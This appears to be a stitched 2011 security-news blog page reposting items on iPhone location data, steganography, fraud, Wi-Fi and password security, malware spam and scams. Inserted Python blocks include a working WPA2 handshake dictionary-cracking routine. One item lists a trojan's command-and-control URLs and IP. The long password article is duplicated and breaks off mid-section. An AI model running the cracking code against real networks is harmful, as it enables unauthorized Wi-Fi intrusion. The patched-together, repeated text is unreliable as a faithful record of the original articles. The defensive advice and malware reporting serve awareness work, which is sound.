All iSpy conspiracy bullshit aside, you are probably more interested in what your iPhone does with location data. Well, if you opt-in to the iPhone's location services, detailed—but anonymized—location data is transmitted back to Apple on a regular basis.
Gadget Lab reminds us of a letter Apple general counsel Bruce Sewell sent to a couple of Congressmen last year explaining how and why Apple collects location data. (Wired's hosting the letter here.) Basically, if you've got Location Services turned on, whenever you request current location data (like via an app), Apple collects info about nearby cell towers and Wi-Fi hotspots. If you happen to be using GPS, it'll collect the GPS coordinates too. That data's then transmitted to Apple every 12 hours over "secure" Wi-Fi networks, anonymized with a "random identification number generated every 24 hours by an iOS device," so neither Apple nor anybody else can personally identify you.
If you remember, Apple started doing its own location services last year (from iOS 3.2 onward), instead of using Google or Skyhook's location data. So, it needs to build and maintain its own database of known tower locations and Wi-Fi hotspots—that's where this info comes in. You're an official location scout for Apple, in other words. When your device asks where it's at, it hits up this database before zeroing in with GPS.
Not too crazy, though it doesn't make the ease with which your location history can be extracted from your Mac or iPhone any less unnerving. Also, it makes the lack of a purge after the data's transmitted to Apple seem more and more like a mere oversight.
More on this is at Gadget Lab: [Gadget Lab] via [Gizmodo]
Thursday, 28 April 2011
Hide Your Data Through Fragmentation, Not Encryption
The thing about data encryption is that it's basically a flashing neon sign indicating "SENSITIVE DATA HERE!" A new technique lets you secure your data by customizing the way that data is fragmented across your drive.
The method uses purpose-built software, rather than the drive's controller, to decide where on the disk a file's clusters are written. The sensitive data is turned into a string of bits, and those bits set the fragmentation pattern of an existing cover file: where two consecutive clusters of the file are stored next to each other, the pair encodes a binary 1; where they are not, it encodes a 0.
The system was developed by Hassan Khan and his colleagues at the University of Science and Technology in Islamabad, Pakistan. They say that it can hide a 20MB message on a 160GB hard drive, and detecting its existence would be "unreasonably complex." This is important because the normal methods of encryption are so well known that they're dead giveaways that something is amiss, and often the fact that you have something to hide can be just as damning as the information itself.
This isn't a permanent solution for data security, of course. Now that this type of camouflage is in the field, it won't be long until a detection method is reverse engineered. But research like this is important for everyone—journalists, dissidents, LOIC enthusiasts—who thinks they are at risk of having their drives seized and searched for incriminating information.
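The encoding rule described above, as an added simulation in Python (this is not the researchers' software, and it models only the cluster chain, not a real filesystem): a cover file of `file_clusters` clusters is laid out so that each consecutive pair of clusters is either adjacent (bit 1) or separated by a one-cluster gap (bit 0). The one-byte length prefix and the toy volume size are assumptions of this example; they tell the reader where the hidden message ends.

```python
from typing import List

CLUSTERS_PER_DISK = 4096  # constructed toy volume; a real disk has millions of clusters


def _bits(data: bytes) -> List[int]:
    """Big-endian bit list of a byte string."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def _bytes(bits: List[int]) -> bytes:
    """Inverse of _bits; trailing bits that do not fill a byte are dropped."""
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def allocate_with_message(file_clusters: int, message: bytes,
                          disk_clusters: int = CLUSTERS_PER_DISK) -> List[int]:
    """Return the cluster chain of a cover file whose adjacency pattern carries message.

    Pair i of the chain encodes one bit: clusters next to each other -> 1,
    a one-cluster gap -> 0.  A one-byte length prefix (assumption of this
    example) lets the reader know how many bits to decode.
    """
    if len(message) > 255:
        raise ValueError("length prefix is one byte in this toy format")
    payload = bytes([len(message)]) + message
    bits = _bits(payload)
    if len(bits) > file_clusters - 1:
        raise ValueError("cover file too small: %d bits needed, %d pairs available"
                         % (len(bits), file_clusters - 1))
    chain = [0]
    for bit in bits:
        chain.append(chain[-1] + 1 if bit else chain[-1] + 2)
    while len(chain) < file_clusters:        # rest of the file: contiguous, carries nothing
        chain.append(chain[-1] + 1)
    if chain[-1] >= disk_clusters:
        raise ValueError("volume too small for this layout")
    return chain


def read_message(chain: List[int]) -> bytes:
    """Recover the hidden message from a cluster chain by reading adjacency."""
    bits = [1 if chain[i + 1] == chain[i] + 1 else 0 for i in range(len(chain) - 1)]
    length = _bytes(bits[:8])[0]
    return _bytes(bits[8:8 + 8 * length])


def fragment_count(chain: List[int]) -> int:
    """Number of contiguous runs the file occupies, i.e. what a defragmenter would report."""
    return 1 + sum(1 for i in range(len(chain) - 1) if chain[i + 1] != chain[i] + 1)


if __name__ == "__main__":
    chain = allocate_with_message(200, b"meet at 9")
    print(fragment_count(chain), "fragments;", read_message(chain))
```

On a real volume the same idea needs raw control over block allocation (the paper's "special software" standing in for the filesystem driver), and the placement of 0-bits should be randomised so the gaps look like ordinary fragmentation; a fixed one-cluster gap, as used here for clarity, is itself a detectable pattern. Note also that a defragmenter, or any copy of the file, silently destroys the message.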
[ScienceDirect via New Scientist via Gizmodo]
Tuesday, 12 April 2011
Corrupt bank worker jailed over Trojan-powered tax scam
A former local business manager at a bank who participated in a £3.2m self assessment tax fraud was jailed for three years and three months on Friday.
Nikola Novakovic, 34, conspired with Oleg Rozputnii, 28, to register over 1,050 fictitious taxpayers on the Income Tax Self Assessment system. The pair claimed fraudulent tax refunds under assumed names before laundering the proceeds of the scam via 200 fraudulent bank accounts.
Personal details needed to pull off the racket were extracted from the computers of consumers using an unspecified computer virus. Rozputnii, an illegal immigrant from the Ukraine, used numerous false identities to help commit the fraud, which also involved Dmytro Shepel, 26, a Ukrainian, also from London.
Joe Rawbone, assistant director of HMRC Criminal Investigation, said: "These men ran an audacious scam stealing millions of pounds. They set up hundreds of false bank accounts using viruses to hack into personal computers to gain information. They used their illegal profits to fund lavish lifestyles, buying performance cars including Porsches, Mercedes and Jaguars. HMRC takes tax fraud extremely seriously and we will recover any financial gain from this criminal activity."
The scam netted £3.2m between January 2008 and September 2010 when the racket was uncovered following a lengthy investigation by HM Revenue & Customs (HMRC).
Sentencing, Mr Recorder Singh QC said that Novakovic "had abused his position with the bank" as part of a "sophisticated and orchestrated fraud".
Novakovic and Rozputnii pleaded guilty to cheating the public revenue in March. Rozputnii, the main mover behind the scam, was jailed for three years and nine months on Friday. Shepel was sentenced to three-and-a-half years at an earlier hearing in August 2010.
Pictures of the subjects and their cars can be found in an HMRC statement on the case here. ®
[TheRegister]
Wireless Security – Choosing the Best Wi-Fi Password
Running through some tests for an upcoming wireless security book and it really brings home the importance of choosing a good password for your Wi-Fi network.
Currently, the best security setting for your home or office Wi-Fi is WPA2.
WPA2 Enterprise is the best if your organization supports it, but WPA2 Personal is great for home and small offices.
Do not use WEP. It was cracked years ago, and an attacker does not even need to guess it: the key is recovered from captured traffic in minutes and reused directly, much as a stolen NTLM hash is passed without ever knowing the password.
The most common technique used for WPA/WPA2 cracking is a dictionary attack.
The attacker captures the WPA/WPA2 four-way handshake and feeds it to a program that derives keys from every entry in a word list until one validates the handshake.
Here is the key point: if the password is not in the word list, the hacker does not get into your network.
Using a lengthy complex password goes a long way in keeping your WPA2 network secure.
A combination of upper/lower case letters, numbers and special characters is the best bet.
Some prefer using a short sentence that means something to them, while replacing some of the letters with numbers and adding in a few extra characters.
I just ran one common word list attack against my WPA2 password. It tried over 1 million word combinations from the list with no dice. My network is still secure!
The more un-dictionary looking your password is, the better!
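What that dictionary attack actually computes, as an added Python example (not code from the book or from this post): the passphrase and SSID go through 4096 rounds of PBKDF2-HMAC-SHA1 to give the PMK; the PMK, the two MAC addresses and the two nonces from the captured handshake give the PTK; and the first 16 bytes of the PTK (the KCK) verify the MIC on message 2. The capture here is constructed, not a real sniff: the MAC addresses, nonces and the EAPOL-Key frame layout are assumptions, and `forge_handshake` builds a frame with a valid MIC for a chosen passphrase so that `crack` can be run offline against a word list.

```python
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Optional

# Layout of the constructed EAPOL-Key frame (message 2 of the 4-way handshake):
# 4-byte EAPOL header, 1 descriptor type, 2 key info, 2 key length, 8 replay counter,
# 32 nonce, 16 IV, 8 RSC, 8 reserved, then the 16-byte MIC at offset 81, 2 key-data length.
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF for the pairwise transient key (KCK is the first 16 bytes)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def forge_handshake(passphrase: str, ssid: str) -> Dict[str, bytes]:
    """Build a synthetic capture (assumed MACs/nonces) whose message 2 carries a valid MIC."""
    ap_mac = bytes.fromhex("001122334455")      # constructed
    sta_mac = bytes.fromhex("66778899aabb")     # constructed
    anonce = hashlib.sha256(b"anonce-sample").digest()
    snonce = hashlib.sha256(b"snonce-sample").digest()
    body = (bytes([2])                                  # descriptor type: RSN
            + struct.pack(">HHQ", 0x010A, 0, 1)         # key info, key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * MIC_LEN + struct.pack(">H", 0)) # MIC placeholder, key data length
    frame = struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 (EAPOL-Key)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": frame}


def crack(capture: Dict[str, bytes], ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate passphrase; return the one whose KCK reproduces the captured MIC."""
    target = capture["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), target):
            return candidate
    return None


if __name__ == "__main__":
    cap = forge_handshake("correct horse", "TestNet")
    print(crack(cap, "TestNet", ["password", "letmein", "correct horse"]))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is why crackers precompute PMKs per SSID and why a passphrase that is not in the list is simply never found. The SSID is the PBKDF2 salt, so a non-default network name also defeats precomputed tables; the standard's own test vector (passphrase "password", SSID "IEEE") is a handy check that the derivation is right.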
Building More Secure Passwords
The problem of weak, guessable security passwords isn’t a new one, but it’s not going away.
In fact it’s getting worse, despite pleading from IT professionals to choose tough-to-guess passwords.
Workers are still disconcertingly likely to come up with something like “password1!” or simply attach a few numbers like “123,” to the end of a word.
As users have to create several passwords for different systems and change them every 60 or 90 days, it’s little wonder they default to the least complicated password their systems allow and make only minor variations when forced to change them.
Unfortunately, such passwords are easy to guess. At the other end of the scale are passwords randomly generated by software, which are difficult for users to remember (leading them to write these passwords down, which defeats the effort).
In a recent paper coauthored by Cisco, Florida State University, and Redjack LLC, researchers examined how different password requirements affect password strength — such as requiring a minimal password length or the addition of a special character.
The researchers discovered that such policies usually don’t provide greater security since hackers are well-versed in these tactics and can use them to guess passwords and access accounts.
For instance, hackers know that when users are required to use a special character in a password, they can simply append that character to the end of the password.
A better practice, say the researchers, is an external password creation tool that changes a password after it is created to add a guaranteed amount of randomness, for example by appending two random digits.
This allows users to choose a password that they are likely to remember while making it difficult for hackers to guess.
Another option is to implement a “judgmental” password policy which will reject a password instantly based on its estimated strength and suggest a stronger one.
Or administrators could implement password protection software, which lets users remember only one strong master password, leaving the application to store encrypted passwords.
Excerpted and adapted from the Cisco 2010 Annual Security Report
[infosecIsland]
DHL Express spam campaign leads to fake AV
A new spam campaign impersonating the popular mail service DHL Express is currently underway, warn Bkis researchers.
The email in question looks like this:

Once the user downloads and opens the attachment, the worm contained in it downloads a fake AV solution from a server located in Russia.
The fake AV ("XP Home Security") immediately starts its work and tries to trick the user into buying a full version that will supposedly remove all the infections it found.
Users are warned to be careful when reviewing emails purportedly coming from DHL Express or any of the other well-known express mail services; more often than not, they are fake emails containing malicious attachments.
[net-security]
Ransom Trojan locks Windows
Ransomware is slowly becoming quite a problem, and the latest one spotted by F-Secure tries a rather innovative approach: it locks the victims out of Windows and doesn't allow them to boot Windows in either normal or Safe mode until they have entered a code to "complete activation":

Posing as a legitimate Microsoft action, the scammers claim that the activation is "absolutely free and is simply a formality." The victims are offered six phone numbers to which they can place a call, enter a given code and once they receive an activation key, enter it and gain access to their computer again.
The note says that the call from the victim's country is free of charge, but that's a complete lie. The calls purportedly go to Microsoft call centers, but the numbers belong to rogue call centers seemingly located in countries such as the Dominican Republic or Somalia, i.e. countries with expensive phone rates.
But these rogue call centers are actually located in countries that are much cheaper to call than the ones listed above, so the scammers and the owners of the call centers split the difference in the fee.
F-Secure's Mikko Hypponen demonstrated how the scam works, and says that no matter how many times and to which of the offered numbers one calls, one is forced to listen to a four-minute prerecorded message that always reveals the same activation code at the end: 1351236.
Your Windows can be unblocked only by entering the code or by formatting your hard drive and restoring its contents from your backup; there is no other way.
[net-security]
“Facebook Support. Your password has been changed!” contains trojan
MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facebook Support. Your password has been changed! ID09687″. Note that the number may change with each email.
The email is sent from the spoofed addresses:
account@facebook.com
manager@facebook.com
The message has the following body:
Dear user of FaceBook.
Your password is not safe!
To secure your account the password has been changed automatically.
Attached document contains a new password to your account and detailed information about new security measures.
Thank you for your attention,
Your Facebook
The attached ZIP file has the name New_Password_IN04393.zip, note that the number at the end will change, and contains the 33 kB large file New_Password.exe.
The trojan is known as Gen:Heur.VIZ.2 (BitDefender), Mal/FakeAV-JX (Sophos), Trojan.Generic.Bredolab-2 (ClamAV).
The following files will be created:
%System%\document.doc
Several Windows registry changes will be executed and the trojan can establish a connection with the IP 193.106.34.20 on port 80.
Data can be obtained from following URLs:
- hxxp://profmiale.ru/TGQW4nHJOS/document.doc
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=8
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=9
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=uploader
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=grabbers
- hxxp://profmiale.ru/TGQW4nHJOS/grabbers.php
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=0
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=1
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=2
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=3
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=4
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=5
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=6
- hxxp://profmiale.ru/TGQW4nHJOS/load.php?file=7
Virus Total permalink and MD5: ecc2d442886b7296b5bd7eaeaae0bcea.
[ComputerSecurityArticles]
Facebook Scam Alert: ‘Everyone do check what she did on cam’ Spreading
We’re monitoring an on-going Facebook scam campaign that seems to be spreading faster than any campaign we’ve come across before.
The scam starts with a user being tagged in a photo (shown in the original post). The photograph is posted in an album called "BBC News" to give it authenticity. It typically has more than 100 people tagged in it and it contains the following text: "Everyone do check what she did on cam …. — [URL]"
The short URL typically redirects the users to a .info domain, which then takes the user to a Facebook Application Installation page.
When a user allows the application, the scam continues with that user posting the same photo, tagging over 100 users in it and helping it propagate.
Users are also redirected to another .info domain, which contains a video that is gated by another form of a survey scam:
The scammers have managed to be nimble enough to switch the campaign from one Short URL service to another. At first, this was spreading via Bit.ly:
Over the course of an hour, this particular URL received over 80,000 clicks. However, the scam has since shifted to the Goo.gl Short URL service:
In less than an hour, the goo.gl version of the scam has reached over 125,000 clicks.
Recommendations: First and foremost, don’t click on the link included in the description of the photograph. One of the things you can do to prevent your friends/family members from falling for this is to untag yourself from the photograph:
Additionally, you can report the image so that Facebook can take action against it (this is an important step):
If you’ve been tricked into installing the application, visit the Privacy Settings page and click on ‘Edit Your Settings’ under Apps and Websites. Locate the Rogue Application under the Apps and Websites section (typically has the word “news” in it). Once you’ve located it under the ‘Apps You Use’ section, click on ‘Edit Settings’ in order to remove the application.
Scammers are finding new ways to trick users. The key here is to be aware and to keep your friends and family members in the loop about scams like this one. We can’t stress that enough.
Update: The goo.gl short URL has now logged over 220,000 clicks.
Additionally, the scammers have also moved to TinyURL:
Image captions from the original post (the screenshots themselves are not reproduced): "What did this girl do on her webcam?"; "An example of what it would look like to see your friends tagged in this photo"; "Short URL redirects to the following Application Install Page"; "Over 100 Friends tagged in this scam"; "Facebook Verification Spam Bot – Freudian Slip?"; "Bit.ly Stats as this scam was first spreading"; "Goo.gl Short URL Statistics for this scam"; "You can untag yourself from any photo"; "You can help prevent this scam from spreading by reporting it"; "Over 220,000 clicks on the goo.gl short URL".
GCHQ says BlackBerry is safest
The UK's National Technical Authority for Information Assurance at GCHQ (CESG) has published smartphone security guidance for public sector workers.
The advice published today covers various phones, including the Apple iPhone, Windows Phone 7 devices, Nokia hardware and BlackBerrys.
Four security procedures documents have been produced, outlining how to best secure any mobile deployment for UK Government departments and organisations on those platforms.
“These security procedures cover architectural issues (such as recommended network layout, recommendations for operational monitoring), configuration advice, user education and training suggestions, and information on residual risks that senior risk owners will need to take into account,” a CESG spokesperson told IT PRO.
“The publication of this risk management advice and guidance is intended to ensure all UK Government organisations have access to the information they need to take educated risk management decisions when deploying remote working solutions using smartphones.”
CESG worked with the telecoms industry to produce the report on how to secure smartphones for remote working, covering lower risk situations.
The guidance document itself was not available to the press.
CESG claimed the document will help many parts of the public sector work more efficiently and effectively, in turn saving money for the taxpayer.
As for handling more serious data, however, the GCHQ body said the only way was BlackBerry.
“The BlackBerry Enterprise Solution from Research In Motion remains the only smartphone system to have been formally evaluated by CESG and is approved to protect material classified up to and including ‘restricted,’” CESG said.
RIM was unsurprisingly buoyant about that particular comment, as a host of supporters talked about BlackBerry security credentials.
“The BlackBerry platform remains, in my opinion, the leader in this respect, providing the highest levels of assurance without the added cost or complexity of needing to bring third-party software into the equation,” said Nick McQuire, director for enterprise mobility at analyst house IDC.
BlackBerry devices are not infallible of course, as the recent Pwn2Own contest highlighted when a Torch 9800 was successfully hacked.
“The reality is that BlackBerry does have more enterprise features and controls such as remote kill, email retention, guaranteed message delivery with application and encryption controls,” said Ron Gula, chief executive (CEO) of Tenable Network Security.
“However, while this is important, a lot of it is just details, and we'll probably see some leapfrogging between the various mobile vendors as they get bitten and react.”
[ITPro]
Friday, 1 April 2011
Hackers Drain Cash From iTunes Accounts
Hacked accounts and fraudulent purchases are leaving iTunes users singing a sad song — again.
Crafty computer criminals are compromising users’ iTunes accounts and purchasing hundreds of dollars worth of music, apps, gift cards, ringtones and games, the security firm Kaspersky Lab reported.
The hacks, discussed in detail in an Apple Discussions blog and an “iTunes Account Hacked!” Facebook page, all share similar characteristics: the assailants gain access to the victims’ credit card information, modify the billing address and use the stolen info to make the fraudulent purchases.
“Another victim! My iTunes was drained of $29.98 on 3/25/11 at midnight,” wrote coupster7 on the Apple blog. “They also changed my billing address city/state to Towson, Md. Reported to apple.”
Unfortunately for users of the ubiquitous music platform, the iTunes hacks have been occurring since early 2010. Unlike coupster7, some attacks do serious damage to victims’ wallets.
On the Facebook page where consumers air hacking grievances, iTunes customer Jeff Tarsha wrote in May 2010, “Just happened to me. $200 out of bank account for stupid items. I think it was iTunes screw up thought because it happened right after placing an order for $1.99 cent song. I think it got messed up with somebody else’s order, but iTunes could care less and instantly blames me for not protecting my data. WTF?”
Hackers have long sought out iTunes as a target because of its popularity and the sensitive banking information users keep stored in their accounts.
Apple has yet to release a public statement about the compromised iTunes accounts. They did not return a call for comment.
[SecurityNewsDaily]
How to Create and Remember Super-Secure Passwords
How many websites did you visit today that required a password? Probably quite a few.
Do you need a password to access data or email at work? You likely do.
In fact, you may have even needed a password to log on to the computer you’re reading this on right now.
Passwords are the front line of defense in protecting the data on your computer. They keep your kids from hijacking your Twitter account, and keep cybercriminals from gaining access to your bank account.
The problem is that because we need so many passwords today, many of us take the easy way out. We either use the same password for everything, or use very simple, easy-to-remember passwords.
And that’s where we can get into trouble.

The risks of weak or multiple-use passwords
“Let’s say you fall for a phishing attack on Facebook,” explained Beth Jones, senior threat researcher for the information-security firm SophosLabs North America. “They can see your email address and try that same password there.
“If you have sensitive information in your email, such as bank statements or credit-card statements, then the attacker can try that password to access bank accounts or credit-card accounts as well,” Jones said.
“They would have several key pieces of [personal] information… so in theory they could try the ‘forgot username’ on other accounts, such as Twitter, or online games,” she said. “You can see how this snowballs quickly.”
Not only should you have a unique password for each site you log into online, but, as Gunther Ollmann, vice president of research at the Atlanta-based computer-security firm Damballa, pointed out, you should also avoid recycling old passwords.
“Criminals — and unethical web masters — often try to use the passwords that have been taken from one site and use them against other sites, especially if your email address is also known to them,” Ollmann explained.
“Each website or application you use should have a different password, and ideally you should not use a predictable algorithm for generating them,” he said. “For example, a bad practice is to use a password that contains the particular website’s name or address in it.”
How to create perfect passwords
So what makes a good, strong password?
“Password strength is measured by two characteristics — length and complexity,” said Josh Shaul, chief technology officer with New York-based Application Security, Inc. and author of Practical Oracle Security: Your Unauthorized Guide to Relational Database Security. “In general, the longer the password, the more difficult it is to guess and the stronger it is.”
Password complexity, he added, means avoiding passwords that can be easily guessed.
“The easiest passwords to remember are simple words, places, dates or easy-to-type text strings,” Shaul said. “Favorite sports teams, cities, names, birthdays and even strings like ‘12345‘ or ‘qwerty‘ are very commonly used. These are all weak passwords.”
Most experts agree on the basics of creating strong passwords. Here are some tips from the Identity Theft Resource Center:
For example, the phrase “I hate to work late” could become “iH82wkl8.”
Or tweak that formula and don’t abbreviate all the words. "This little piggy went to market" might become "tlpWENT2m."
Not sure, even after following those tips, whether your password is strong enough? Go to one of the many websites that will check it for you.
Can’t think of a good password? There are also websites that generate them.
Should you write them down?
So if we need a unique, strong password for nearly everything we do online — check multiple email accounts, use Facebook and Twitter, make comments on CNN, buy something from Amazon — how can we remember them all? Is it okay to write them down somewhere?
Several years ago, the conventional wisdom was to never write down passwords — but that was when most of us only had a few to remember.
Some experts have since changed their minds.
“With today's threat landscape being dominated by password-stealing malware, physically writing down your passwords is becoming more acceptable,” Damballa’s Ollman said.
“The probability of someone breaking into your house and stealing your written-down passwords is considerably more remote than the 1-in-3 to 1-in-4 probability that your computer will fall to a criminal’s malware,” Ollman said.
Jones of SophosLabs sticks to the old advice — don’t write them down.
“This is really not a great idea, particularly for work,” Jones said. “Physical security is just as important as online security.
“Anyone walking by could see the sticky note next to your machine and then break into your accounts (especially if you use the same password for everything),” she added. “The risk is even greater if, as a user, you log into more than one location and have your password written at all those locations.”
Web browsers often ask if they can remember your password for you. Is that safer than writing down your password?
“For some passwords, it may be okay to let the browser remember your password on your personal laptop or home PC,” said Chris Burchett, founder and chief technology officer with Addison, Texas-based information-security firm Credant.
“In general, if the information on the website that requires your password is what you consider to be public, then it may be okay to let the browser remember the password,” Burchett said. “But be careful.
Never let the browser remember passwords to banking websites or other sites where private personal identity information is used or available.”
“Also be careful when using a public-kiosk computer like the ones at the airport. Never let browsers on computers you don't own store passwords,” he added. “In fact, it would be best not to log into any website requiring a password from a computer you don't own.”
Password-management software
Instead, the experts suggest using third-party password-management software, which stores all your passwords in one place and protects them with one very strong master password — the only one you’ll have to remember.
“Managing passwords is a challenge because there are so many online accounts requiring passwords these days,” Burchett said. “Using a password manager to securely generate, store, rotate and supply passwords on demand may be worth considering as long as you remember to make the master password strong enough.”
There are dozens of password managers, both free and inexpensive (none cost more than $30). Some of the better-known ones include Web Confidential, LastPass, KeePass and its Mac/Linux sibling KeePassX. Some run on PCs, others on smartphones, while some are browser plug-ins.
As for the password managers that come with browsers, most of them aren’t very secure. Only Opera and Mozilla Firefox use master passwords, and Firefox’s is turned off by default. (Here’s how to turn it on.)
Now that you’ve read all this, do yourself a favor this weekend. Go through all your online accounts and use these tips to create strong, unique passwords for each one, and then use a password manager to remember them all.
It’ll take less time than you think. Next time a friend or relative has an email account hijacked or gets charged for dozens of iTunes songs he didn’t buy, you’ll be glad you did.
[SecurityNewsDaily]
Do you need a password to access data or email at work? You likely do.
In fact, you may have even needed a password to log on to the computer you’re reading this on right now.
Passwords are the front line of defense in protecting the data on your computer. They keep your kids from hijacking your Twitter account, and keep cybercriminals from gaining access to your bank account.
The problem is that because we need so many passwords today, many of us take the easy way out. We either use the same password for everything, or use very simple, easy-to-remember passwords.
And that’s where we can get into trouble.
The risks of weak or multiple-use passwords
“Let’s say you fall for a phishing attack on Facebook,” explained Beth Jones, senior threat researcher for the information-security firm SophosLabs North America. “They can see your email address and try that same password there.
“If you have sensitive information in your email, such as bank statements or credit-card statements, then the attacker can try that password to access bank accounts or credit-card accounts as well,” Jones said.
“They would have several key pieces of [personal] information… so in theory they could try the ‘forgot username’ on other accounts, such as Twitter, or online games,” she said. “You can see how this snowballs quickly.”
Not only should you have a unique password for each site you log into online, but, as Gunther Ollmann, vice president of research at the Atlanta-based computer-security firm Damballa, pointed out, you should also avoid recycling old passwords.
“Criminals — and unethical web masters — often try to use the passwords that have been taken from one site and use them against other sites, especially if your email address is also known to them,” Ollmann explained.
“Each website or application you use should have a different password, and ideally you should not use a predictable algorithm for generating them,” he said. “For example, a bad practice is to use a password that contains the particular website’s name or address in it.”
How to create perfect passwords
So what makes a good, strong password?
“Password strength is measured by two characteristics — length and complexity,” said Josh Shaul, chief technology officer with New York-based Application Security, Inc. and author of Practical Oracle Security: Your Unauthorized Guide to Relational Database Security. “In general, the longer the password, the more difficult it is to guess and the stronger it is.”
Password complexity, he added, means avoiding passwords that can be easily guessed.
“The easiest passwords to remember are simple words, places, dates or easy-to-type text strings,” Shaul said. “Favorite sports teams, cities, names, birthdays and even strings like ‘12345’ or ‘qwerty’ are very commonly used. These are all weak passwords.”
Most experts agree on the basics of creating strong passwords. Here are some tips from the Identity Theft Resource Center:
- A password should contain at least eight characters (some experts say 10 or 14 characters is the minimum).
- The password should have at least three of the four following types of characters — upper-case letters (ABC), lower-case letters (abc), numerals (123), and punctuation marks or other special characters (!#$%&*_=+?).
- If you’re using only one capital letter or special character, don’t make it the first or last character in the password.
- Avoid common names, slang words or any words in the dictionary. Computers can run through entire dictionaries in minutes.
- Don’t include any part of your name or any part of your email addresses.
- Choose an especially strong password for websites that hold especially sensitive personal information — for example, banks or online retailers that store your credit-card information.
- Don’t ever refer to anything that can be learned from your social networking profiles or an Internet search. In other words, don’t make it your favorite band or movie, your pet’s name, your nickname, your phone number or, especially, your birth date.
For example, the phrase “I hate to work late” could become “iH82wkl8.”
Or tweak that formula and don’t abbreviate all the words. "This little piggy went to market" might become "tlpWENT2m."
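The Identity Theft Resource Center tips above, turned into a checker as an added example (this is not code from the ITRC or from any of the experts quoted); the small word list and the sample name and e-mail address are constructed stand-ins for a real dictionary and the user's own details.

```python
"""Check a candidate password against the Identity Theft Resource Center
tips listed above: length, three of four character classes, no lone
capital or special character at either end, no dictionary words, and no
part of the user's name or e-mail address.
"""

SPECIALS = set("!#$%&*_=+?")        # the punctuation set the tips mention
MIN_LENGTH = 8
# Constructed stand-in for a real dictionary; a real check would load a
# full word list (and a password cracker will try far more than this).
DICTIONARY = {"password", "welcome", "summer", "market", "piggy"}


def check_password(password, name="", email=""):
    """Return the list of tips the password violates (empty means it passes)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    classes = {
        "upper": [c for c in password if c.isupper()],
        "lower": [c for c in password if c.islower()],
        "digit": [c for c in password if c.isdigit()],
        "special": [c for c in password if c in SPECIALS],
    }
    present = [kind for kind, chars in classes.items() if chars]
    if len(present) < 3:
        problems.append("fewer than three character classes")

    # A lone capital or special character should not sit at either end,
    # the positions guessing tools try first.
    for kind in ("upper", "special"):
        chars = classes[kind]
        if len(chars) == 1 and chars[0] in (password[:1], password[-1:]):
            problems.append(f"only {kind} character is first or last")

    low = password.lower()
    if any(word in low for word in DICTIONARY):
        problems.append("contains a dictionary word")

    # Pieces of the name and of the e-mail local part, e.g. "alice" and
    # "smith" from "alice.smith@example.org".
    parts = name.lower().split()
    local = email.lower().split("@")[0]
    parts += local.replace(".", " ").replace("_", " ").split()
    if any(len(p) >= 3 and p in low for p in parts):
        problems.append("contains part of name or e-mail address")
    return problems


if __name__ == "__main__":
    for pw in ("iH82wkl8", "tlpWENT2m", "password1"):
        print(pw, "->", check_password(pw) or "passes")
```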
Not sure, even after following those tips, whether your password is strong enough? Go to one of the many websites that will check it for you.
Can’t think of a good password? There are also websites that generate them.
Should you write them down?
So if we need a unique, strong password for nearly everything we do online — check multiple email accounts, use Facebook and Twitter, make comments on CNN, buy something from Amazon — how can we remember them all? Is it okay to write them down somewhere?
Several years ago, the conventional wisdom was to never write down passwords — but that was when most of us only had a few to remember.
Some experts have since changed their minds.
“With today's threat landscape being dominated by password-stealing malware, physically writing down your passwords is becoming more acceptable,” Damballa’s Ollmann said.
“The probability of someone breaking into your house and stealing your written-down passwords is considerably more remote than the 1-in-3 to 1-in-4 probability that your computer will fall to a criminal’s malware,” Ollmann said.
Jones of SophosLabs sticks to the old advice — don’t write them down.
